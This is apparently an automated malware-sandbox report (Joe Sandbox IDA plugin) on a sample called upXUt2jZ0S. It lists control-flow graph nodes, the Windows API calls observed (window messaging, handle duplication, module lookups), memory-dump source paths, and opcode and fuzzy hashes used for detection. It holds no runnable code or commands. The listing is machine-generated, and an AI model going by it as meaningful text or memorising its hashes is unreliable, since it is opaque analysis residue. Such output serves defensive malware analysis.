302dcf6 36356->36357 36358 302dd53 KiUserCallbackDispatcher 36356->36358 36359 302dd60 KiUserCallbackDispatcher 36356->36359 36357->36352 36358->36357 36359->36357 36385 302d438 36386 302d43d GetCurrentProcess 36385->36386 36388 302d4d0 GetCurrentThread 36386->36388 36389 302d4c9 36386->36389 36390 302d506 36388->36390 36391 302d50d GetCurrentProcess 36388->36391 36389->36388 36390->36391 36394 302d543 36391->36394 36392 302d56b GetCurrentThreadId 36393 302d59c 36392->36393 36394->36392 36360 650503b 36361 650504e 36360->36361 36365 6505320 PostMessageW 36361->36365 36367 6505318 36361->36367 36362 6505071 36366 650538c 36365->36366 36366->36362 36368 6505320 PostMessageW 36367->36368 36369 650538c 36368->36369 36369->36362

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 47 650e520-650e583 48 650e5b2-650e5d0 47->48 49 650e585-650e5af 47->49 54 650e5d2-650e5d4 48->54 55 650e5d9-650e610 48->55 49->48 56 650ea92-650eaa7 54->56 59 650ea41 55->59 60 650e616-650e62a 55->60 63 650ea46-650ea5c 59->63 61 650e659-650e678 60->61 62 650e62c-650e656 60->62 69 650e690-650e692 61->69 70 650e67a-650e680 61->70 62->61 63->56 73 650e6b1-650e6ba 69->73 74 650e694-650e6ac 69->74 71 650e682 70->71 72 650e684-650e686 70->72 71->69 72->69 76 650e6c2-650e6c9 73->76 74->63 77 650e6d3-650e6da 76->77 78 650e6cb-650e6d1 76->78 79 650e6e4 77->79 80 650e6dc-650e6e2 77->80 81 650e6e7-650e704 call 650c890 78->81 79->81 80->81 84 650e859-650e85d 81->84 85 650e70a-650e711 81->85 87 650e863-650e867 84->87 88 650ea2c-650ea3f 84->88 85->59 86 650e717-650e754 85->86 96 650ea22-650ea26 86->96 97 650e75a-650e75f 86->97 89 650e881-650e88a 87->89 90 650e869-650e87c 87->90 88->63 92 650e8b9-650e8c0 89->92 93 650e88c-650e8b6 89->93 90->63 94 650e8c6-650e8cd 92->94 95 650e95f-650e974 92->95 93->92 99 650e8fc-650e91e 94->99 100 650e8cf-650e8f9 94->100 95->96 109 650e97a-650e97c 95->109 96->76 96->88 101 650e791-650e7a6 call 650c8b4 97->101 102 650e761-650e76f call 650c89c 97->102 99->95 137 650e920-650e92a 99->137 100->99 107 650e7ab-650e7af 101->107 102->101 116 650e771-650e78f call 650c8a8 102->116 112 650e820-650e82d 107->112 113 650e7b1-650e7c3 call 650c8c0 107->113 114 650e9c9-650e9e6 call 650c890 109->114 115 650e97e-650e9b7 109->115 112->96 128 650e833-650e83d call 650c8d0 112->128 140 650e803-650e81b 113->140 141 650e7c5-650e7f5 113->141 114->96 127 650e9e8-650ea14 WaitMessage 114->127 131 650e9c0-650e9c7 115->131 132 650e9b9-650e9bf 115->132 116->107 134 650ea16 127->134 135 650ea1b 127->135 143 650e84c-650e854 call 650e10c 128->143 144 650e83f-650e842 call 650c8dc 128->144 131->96 132->131 134->135 135->96 148 650e942-650e95d 137->148 149 650e92c-650e932 137->149 140->63 155 650e7f7 141->155 156 650e7fc 141->156 143->96 151 650e847 144->151 148->95 148->137 153 650e934 149->153 154 650e936-650e938 149->154 151->96 153->148 154->148 155->156 156->140
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2612321321.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6500000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID: DispatchMessage
                                                                        • String ID:
                                                                        • API String ID: 2061451462-0
                                                                        • Opcode ID: 58bef4cece3a293231cf0b5a2a70d04eb6c5a47eb8f0c8af5be5905ee9aa25b6
                                                                        • Instruction ID: 96f82ffbcf9bcb546eb9d1092f24ddb72f7e21679aaf623ec08760b16fcb3e32
                                                                        • Opcode Fuzzy Hash: 58bef4cece3a293231cf0b5a2a70d04eb6c5a47eb8f0c8af5be5905ee9aa25b6
                                                                        • Instruction Fuzzy Hash: 20F12870E00209CFEB54DFA9D949B9DBBF1BF88304F258959E405AB2A1DB74E945CF80
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2612321321.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6500000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 187789bb3e3b77d4d314ef4515357e615797c19249cc9e30baafdf1642e0978b
                                                                        • Instruction ID: 75eff4185cb0695e06dbf140130233b68265c76f4116f6c3e3c28d5d6c7939d3
                                                                        • Opcode Fuzzy Hash: 187789bb3e3b77d4d314ef4515357e615797c19249cc9e30baafdf1642e0978b
                                                                        • Instruction Fuzzy Hash: 4C425A30E00219CFEB94DFA9C89479EBBB6BF88340F148569D509AB294DB34DD85CF91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2612321321.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6500000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5f59c329514c295b734ac6721f8a1dbfff8a593e9985e7241be2b39df31f85b7
                                                                        • Instruction ID: a3334dd7bbc42dee0e5f78fae56d7834da551bec05f66e5889afd0ae26b2603a
                                                                        • Opcode Fuzzy Hash: 5f59c329514c295b734ac6721f8a1dbfff8a593e9985e7241be2b39df31f85b7
                                                                        • Instruction Fuzzy Hash: 32C15A31E006198FEFA5CFA5C88479DBBB2BF88300F14C5A9D859AB295DB30D985CF51

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 0302D4B6
                                                                        • GetCurrentThread.KERNEL32 ref: 0302D4F3
                                                                        • GetCurrentProcess.KERNEL32 ref: 0302D530
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0302D589
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2592132253.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3020000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: 39732bc337e28bbf53c1f10b243c2580eda79b920291198ba67b0435744eee80
                                                                        • Instruction ID: c8d166d4bf2b6533ed9160dd8d2a562d194d267771077144b19e293a22cdbb11
                                                                        • Opcode Fuzzy Hash: 39732bc337e28bbf53c1f10b243c2580eda79b920291198ba67b0435744eee80
                                                                        • Instruction Fuzzy Hash: B65167B09017198FDB54CFAAD448BAEFFF1AF48304F248059E019A7390DB75A944CB66

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 0302D4B6
                                                                        • GetCurrentThread.KERNEL32 ref: 0302D4F3
                                                                        • GetCurrentProcess.KERNEL32 ref: 0302D530
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0302D589
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2592132253.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3020000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: 57c7c156a227a87e043c65caad36822dcfc85a403bf5d454c9b2416d91197406
                                                                        • Instruction ID: 10798b45b32c7a470176eb0502ee53ef35be4d20fe79e4b6a4bbcc879dff7d98
                                                                        • Opcode Fuzzy Hash: 57c7c156a227a87e043c65caad36822dcfc85a403bf5d454c9b2416d91197406
                                                                        • Instruction Fuzzy Hash: ED5166B09013198FDB54CFAAD548B9EFBF1AF48304F248459E019A73A0DB75A984CB66

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 159 302ada8-302adb7 161 302ade3-302ade7 159->161 162 302adb9-302adc6 call 302a100 159->162 164 302adfb-302ae3c 161->164 165 302ade9-302adf3 161->165 169 302adc8 162->169 170 302addc 162->170 171 302ae49-302ae57 164->171 172 302ae3e-302ae46 164->172 165->164 220 302adce call 302b030 169->220 221 302adce call 302b040 169->221 170->161 173 302ae7b-302ae7d 171->173 174 302ae59-302ae5e 171->174 172->171 178 302ae80-302ae87 173->178 176 302ae60-302ae67 call 302a10c 174->176 177 302ae69 174->177 175 302add4-302add6 175->170 179 302af18-302af92 175->179 181 302ae6b-302ae79 176->181 177->181 182 302ae94-302ae9b 178->182 183 302ae89-302ae91 178->183 210 302af94-302af96 179->210 211 302af99-302af9c 179->211 181->178 186 302aea8-302aeb1 call 302a11c 182->186 187 302ae9d-302aea5 182->187 183->182 191 302aeb3-302aebb 186->191 192 302aebe-302aec3 186->192 187->186 191->192 194 302aee1-302aeee 192->194 195 302aec5-302aecc 192->195 201 302aef0-302af0e 194->201 202 302af11-302af17 194->202 195->194 196 302aece-302aede call 302a12c call 302a13c 195->196 196->194 201->202 213 302af9d-302afd8 210->213 214 302af98 210->214 211->213 215 302afe0-302b00b GetModuleHandleW 213->215 216 302afda-302afdd 213->216 214->211 217 302b014-302b028 215->217 218 302b00d-302b013 215->218 216->215 218->217 220->175 221->175
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0302AFFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2592132253.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3020000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 36f849401086cb0694b6da693dd5ab99ef9bd5ef29ee856b31e7502805cf92ff
                                                                        • Instruction ID: 518da81fc7371cd3d42d20c7e52993fd5f9885ab7c9bcd4ada4b6ba4efa02be1
                                                                        • Opcode Fuzzy Hash: 36f849401086cb0694b6da693dd5ab99ef9bd5ef29ee856b31e7502805cf92ff
                                                                        • Instruction Fuzzy Hash: EC817870A01B158FDB64DF6AC44079ABBF5FF88304F04892DD44ADBA50DB35E846CB90

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 222 302590d-302590e 223 3025910-3025912 222->223 224 3025915 222->224 225 3025914 223->225 226 3025919-30259d9 CreateActCtxA 223->226 224->226 225->224 228 30259e2-3025a3c 226->228 229 30259db-30259e1 226->229 236 3025a4b-3025a4f 228->236 237 3025a3e-3025a41 228->237 229->228 238 3025a60 236->238 239 3025a51-3025a5d 236->239 237->236 241 3025a61 238->241 239->238 241->241
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 030259C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2592132253.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3020000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 068000868f9d358941ff28d5d4453e7e10b79b1e88a112b985780d501726f9a8
                                                                        • Instruction ID: f2b20180b6a399c352424282071fb9d8d64dab4026c8232f5b2c1f86e07b7bfa
                                                                        • Opcode Fuzzy Hash: 068000868f9d358941ff28d5d4453e7e10b79b1e88a112b985780d501726f9a8
                                                                        • Instruction Fuzzy Hash: B341EFB0C01729CFDB24DFAAC88479EFBB5BF49314F24806AD408AB251DB756945CF90

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 242 3024248-30259d9 CreateActCtxA 246 30259e2-3025a3c 242->246 247 30259db-30259e1 242->247 254 3025a4b-3025a4f 246->254 255 3025a3e-3025a41 246->255 247->246 256 3025a60 254->256 257 3025a51-3025a5d 254->257 255->254 259 3025a61 256->259 257->256 259->259
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 030259C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2592132253.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3020000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: b7e58bdfd4a25db37ac216ef9d4c93fb83b2c18f8e87bb8b6de9dc5df1d46c4f
                                                                        • Instruction ID: b85dbb256628459f0d2c947e7d34adfd3dafcdea8c736042f8a683c83349e661
                                                                        • Opcode Fuzzy Hash: b7e58bdfd4a25db37ac216ef9d4c93fb83b2c18f8e87bb8b6de9dc5df1d46c4f
                                                                        • Instruction Fuzzy Hash: D241FFB0C01729CBDB24CFAAC884B8EFBF5BF49304F20846AD408AB251DB756945CF90

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 260 6503780-650378c 262 6503792-6503842 SendMessageW 260->262 263 650378e-6503791 260->263 269 6503844-650384a 262->269 270 650384b-650385f 262->270 269->270
                                                                        APIs
                                                                        • SendMessageW.USER32(?,?,?,?), ref: 06503835
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2612321321.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6500000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 6d0bad21a9c0b71e63804ddd3ce233bee4debc27d54b937613fc170c990342be
                                                                        • Instruction ID: 75101eca8a19916f2e85ce79e27acce0c23cd4c4ecf890dd5cc5cb4f9436df8e
                                                                        • Opcode Fuzzy Hash: 6d0bad21a9c0b71e63804ddd3ce233bee4debc27d54b937613fc170c990342be
                                                                        • Instruction Fuzzy Hash: 242146B19003099FDB10DFAAC885B9EBBF8FF48310F20846AE509A7750D775A944CFA5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 272 65019a8-6501a18 276 6501a20-6501a4f SetWindowTextW 272->276 277 6501a1a-6501a1d 272->277 278 6501a51-6501a57 276->278 279 6501a58-6501a79 276->279 277->276 278->279
                                                                        APIs
                                                                        • SetWindowTextW.USER32(?,00000000), ref: 06501A42
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2612321321.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6500000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID: TextWindow
                                                                        • String ID:
                                                                        • API String ID: 530164218-0
                                                                        • Opcode ID: 0cca1b289f29678741bf4b1b084be50489da960d64d83ed72290a154a079d443
                                                                        • Instruction ID: 3009715bf580bd3d9aa91b3e31ee364160b7ebe0a94af843e9eedae828c56b07
                                                                        • Opcode Fuzzy Hash: 0cca1b289f29678741bf4b1b084be50489da960d64d83ed72290a154a079d443
                                                                        • Instruction Fuzzy Hash: 5C2126768043898FDB11CFAAD884ADAFFF4AF49210F14845AD494A7251D338A549CFA5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 281 302d679-302d67e 282 302d680-302d684 281->282 283 302d685-302d714 DuplicateHandle 281->283 282->283 284 302d716-302d71c 283->284 285 302d71d-302d73a 283->285 284->285
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0302D707
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2592132253.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3020000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 8c8bd18cf807ad2c32da89674a6771950115531162f814c2b19ffd732a8fc3d9
                                                                        • Instruction ID: 0428e56b422584af33299bae42c448c197849c5445fcd1741b113b2f3decca36
                                                                        • Opcode Fuzzy Hash: 8c8bd18cf807ad2c32da89674a6771950115531162f814c2b19ffd732a8fc3d9
                                                                        • Instruction Fuzzy Hash: 2D21E3B5D012199FDB10CFAAD884ADEFBF9EB48310F14841AE918A3350D378A944CFA5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 288 302d680-302d714 DuplicateHandle 290 302d716-302d71c 288->290 291 302d71d-302d73a 288->291 290->291
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0302D707
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2592132253.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3020000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: e36e12e1d47f12a63d1dc2f784a8da1d909c0726b539b7cd56509547df17b083
                                                                        • Instruction ID: e0e968d50182c7fdebb112aca7c09239a656c518783b126d1f6eff58861774a9
                                                                        • Opcode Fuzzy Hash: e36e12e1d47f12a63d1dc2f784a8da1d909c0726b539b7cd56509547df17b083
                                                                        • Instruction Fuzzy Hash: 0B21E2B5D002099FDB10CFAAD884ADEFBF8EB48310F14841AE918A3350D378A940CFA1

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 294 65019d8-6501a18 295 6501a20-6501a4f SetWindowTextW 294->295 296 6501a1a-6501a1d 294->296 297 6501a51-6501a57 295->297 298 6501a58-6501a79 295->298 296->295 297->298
                                                                        APIs
                                                                        • SetWindowTextW.USER32(?,00000000), ref: 06501A42
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2612321321.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6500000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID: TextWindow
                                                                        • String ID:
                                                                        • API String ID: 530164218-0
                                                                        • Opcode ID: 776c870b219872173c40343899ca1178a1ee8222f1b3b9e730fa604df1ca02c5
                                                                        • Instruction ID: 144473d09a753c15714f495ba91e6af04cfc748f9e5ba94ab38cba4eb729e874
                                                                        • Opcode Fuzzy Hash: 776c870b219872173c40343899ca1178a1ee8222f1b3b9e730fa604df1ca02c5
                                                                        • Instruction Fuzzy Hash: 4D11F6B6C006498FDB14CF9AC844BDEFBF4FB88310F14842AD859A7641D378A549CFA5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 300 6505318-650538a PostMessageW 302 6505393-65053b4 300->302 303 650538c-6505392 300->303 303->302
                                                                        APIs
                                                                        • PostMessageW.USER32(?,?,?,?), ref: 0650537D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2612321321.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6500000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: 44b5bfe6b6313bda8110207cef9e496ad18298dfe921bcf40888bba245080d48
                                                                        • Instruction ID: 1b4b3dce8461d913780ced5e5724fdbb5c174c47514cc614fcb363f268b5d74d
                                                                        • Opcode Fuzzy Hash: 44b5bfe6b6313bda8110207cef9e496ad18298dfe921bcf40888bba245080d48
                                                                        • Instruction Fuzzy Hash: FC110AB58003499FDB10CF9AC945BDEFBF8FB48310F148419E954A3651D379A544CFA5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 305 6505320-650538a PostMessageW 306 6505393-65053b4 305->306 307 650538c-6505392 305->307 307->306
                                                                        APIs
                                                                        • PostMessageW.USER32(?,?,?,?), ref: 0650537D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2612321321.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6500000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: b485e23b6941eba87c4502025bf86cb9847d21e89c0c6ebe9aeb906ead57350d
                                                                        • Instruction ID: 80f2952bc36857869a8fe4b42c3e1990bb1dd0c6471a73eda34f9c12a5c5ecb9
                                                                        • Opcode Fuzzy Hash: b485e23b6941eba87c4502025bf86cb9847d21e89c0c6ebe9aeb906ead57350d
                                                                        • Instruction Fuzzy Hash: 141106B58003499FDB10CF9AC945BEEFBF8FB48320F10841AE558A3651D378A544CFA5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 309 302af98-302afd8 312 302afe0-302b00b GetModuleHandleW 309->312 313 302afda-302afdd 309->313 314 302b014-302b028 312->314 315 302b00d-302b013 312->315 313->312 315->314
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0302AFFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2592132253.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3020000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 058896db979a312ba019e52723ac1ffbe6b64ace78a6217213c7b0c9af51c717
                                                                        • Instruction ID: e9017e92b49fd26b1757b203afe55d0d1e3cfd8abef94423b314f819a91d1581
                                                                        • Opcode Fuzzy Hash: 058896db979a312ba019e52723ac1ffbe6b64ace78a6217213c7b0c9af51c717
                                                                        • Instruction Fuzzy Hash: F311E0B5C007598FDB10CF9AC444BDEFBF4AF88314F14842AD829A7610D379A545CFA1

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 317 6501fb1-6502022 SendMessageW 319 6502024-650202a 317->319 320 650202b-650203f 317->320 319->320
                                                                        APIs
                                                                        • SendMessageW.USER32(?,?,?,?), ref: 06502015
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2612321321.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6500000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: f72f57506356acefd3f4a80327b7243a4319c603e970745162df1830f9a1cf74
                                                                        • Instruction ID: 40fdc70d9274c0d76dad77f7f3d9245e077d58d685f894e4a48203bc47ece5c4
                                                                        • Opcode Fuzzy Hash: f72f57506356acefd3f4a80327b7243a4319c603e970745162df1830f9a1cf74
                                                                        • Instruction Fuzzy Hash: 5B1103B58003499FDB10CF9AC845BDEFBF8FB48310F14881AE518A7650C375A944CFA5
                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 06506CBD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2612321321.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6500000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID:
                                                                        • API String ID: 2538663250-0
                                                                        • Opcode ID: 73a999587b1536c8132af01604e9d9725c7fdcebf993633f3b3f2eb40e0f547e
                                                                        • Instruction ID: 8daa6b877f6992cd8e7e533cc3ecf32685e288f80d6975c42c2928a31ad8043d
                                                                        • Opcode Fuzzy Hash: 73a999587b1536c8132af01604e9d9725c7fdcebf993633f3b3f2eb40e0f547e
                                                                        • Instruction Fuzzy Hash: 7A1103B5C007498FDB10DF9AD585BDEBBF4FB48210F108469D518A7740D378A944CFA5
                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 06506CBD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2612321321.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6500000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID:
                                                                        • API String ID: 2538663250-0
                                                                        • Opcode ID: cb11897bb9ce52c0b19c65ce7a27bafea0e2ac11aa4431ffba12b1fc34c9668d
                                                                        • Instruction ID: c00ea64aa349c565801607b9cb3ae22e24d3766b90dbfec4bf27ce64142ff198
                                                                        • Opcode Fuzzy Hash: cb11897bb9ce52c0b19c65ce7a27bafea0e2ac11aa4431ffba12b1fc34c9668d
                                                                        • Instruction Fuzzy Hash: 9811FEB58007498FDB20DFAAD946BDEBBF4EB48224F20846AD518A7740C378A544CFA5
                                                                        APIs
                                                                        • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0650E847), ref: 0650F2E5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2612321321.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6500000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID: DispatchMessage
                                                                        • String ID:
                                                                        • API String ID: 2061451462-0
                                                                        • Opcode ID: c9daa3fe7f39b7b196dd44a2924a8be90225d16abd51bc7d74e4c25ef83d925c
                                                                        • Instruction ID: 45e87167fa8e8c9fffd1891d849d5004d9af48a8dce06045f61b47a996256b3e
                                                                        • Opcode Fuzzy Hash: c9daa3fe7f39b7b196dd44a2924a8be90225d16abd51bc7d74e4c25ef83d925c
                                                                        • Instruction Fuzzy Hash: 4F11EDB5C0468A8FDB20CF9AD844BDEFBF4FB48310F10852AE819A7640D379A544CFA5
                                                                        APIs
                                                                        • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0650E847), ref: 0650F2E5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2612321321.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6500000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID: DispatchMessage
                                                                        • String ID:
                                                                        • API String ID: 2061451462-0
                                                                        • Opcode ID: ce3d8836988ba445d81298160f151b00da436e17f5bb2e75c3e5e36f07aeeb67
                                                                        • Instruction ID: f6419192800c98537bce1809a6b7af66e25d96531213c1ccce144d07d616c4b6
                                                                        • Opcode Fuzzy Hash: ce3d8836988ba445d81298160f151b00da436e17f5bb2e75c3e5e36f07aeeb67
                                                                        • Instruction Fuzzy Hash: 1E1122B4C042898FDB10CFAAD844BCEFBF4AB48314F10846AD418A7240C378A544CFA5
                                                                        APIs
                                                                        • SendMessageW.USER32(?,?,?,?), ref: 06502015
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2612321321.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6500000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 9a3beaed06890263c193aaca50aa5a9ee52360fb169259f97802ed60421f867e
                                                                        • Instruction ID: 103c7629fe03986bf76fe71b7712117a267f6967c49a3963d881915239a64058
                                                                        • Opcode Fuzzy Hash: 9a3beaed06890263c193aaca50aa5a9ee52360fb169259f97802ed60421f867e
                                                                        • Instruction Fuzzy Hash: 5E11E2B58003499FDB10DF9AC889BDEFBF8FB48324F10841AE558A7650D379A944CFA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2591643152.0000000002F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2f9d000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
